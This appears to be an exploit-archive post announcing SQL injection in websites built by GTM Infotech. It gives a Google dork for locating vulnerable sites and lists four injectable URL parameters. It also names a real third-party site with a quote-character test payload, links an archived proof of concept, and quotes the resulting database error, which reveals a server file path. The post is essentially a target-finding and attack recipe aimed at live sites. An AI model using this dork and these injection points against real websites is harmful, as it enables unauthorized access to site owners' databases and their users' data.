facebook facebook twitter rss

Powered by GTM Infotech Company in Delhi SQL Injection

Author: KingSkrupellos , Published: 08-10-2018
#################################################################################################

# Exploit Title : Powered by GTM Infotech Company in Delhi SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 04/10/2018
# Vendor Homepage : gtminfotech.com
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]

#################################################################################################

# Google Dork :

intext:''Powered by GTM Infotech''

# SQL Injection Exploit :

/story-details.php?sid=[SQL Injection]

/question-details.php?tid=[SQL Injection]

/category-topic.php?cid=[ID-NUMBER]&scid=[SQL Injection]

/category-story.php?cid=[ID-NUMBER]&scid=[SQL Injection]

#################################################################################################

# Example Vulnerable Site => sumitnabham.com/story-details.php?sid=108%27 => [ Proof of Concept ] => archive.is/8QDn4

# SQL Database Error =>

Fatal error: Call to a member function RecordCount() on boolean in /home/sumitnab/public_html/story-details.php on line 171

#################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

#################################################################################################

Like us on Facebook :